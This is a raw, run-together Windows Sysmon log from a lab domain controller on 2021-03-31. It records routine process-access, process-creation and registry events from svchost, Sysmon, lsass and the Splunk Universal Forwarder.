12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6480-6064-5700-00000000AE01}3008C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-6480-6064-5600-00000000AE01}26123740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-6480-6064-5700-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.728{266CAFBE-6480-6064-5700-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-6480-6064-5600-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 
10341000x80000000000000002477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6480-6064-5600-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000002470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:04.721{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72625-0x86c1f3d2) 10341000x80000000000000002469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6480-6064-5600-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.705{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-6480-6064-5600-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-6480-6064-5600-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.674{266CAFBE-6480-6064-5500-00000000AE01}40124016C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000002462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.658{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
